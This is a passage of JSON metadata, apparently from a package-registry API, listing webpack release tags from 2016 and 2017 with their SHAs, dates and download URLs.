tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"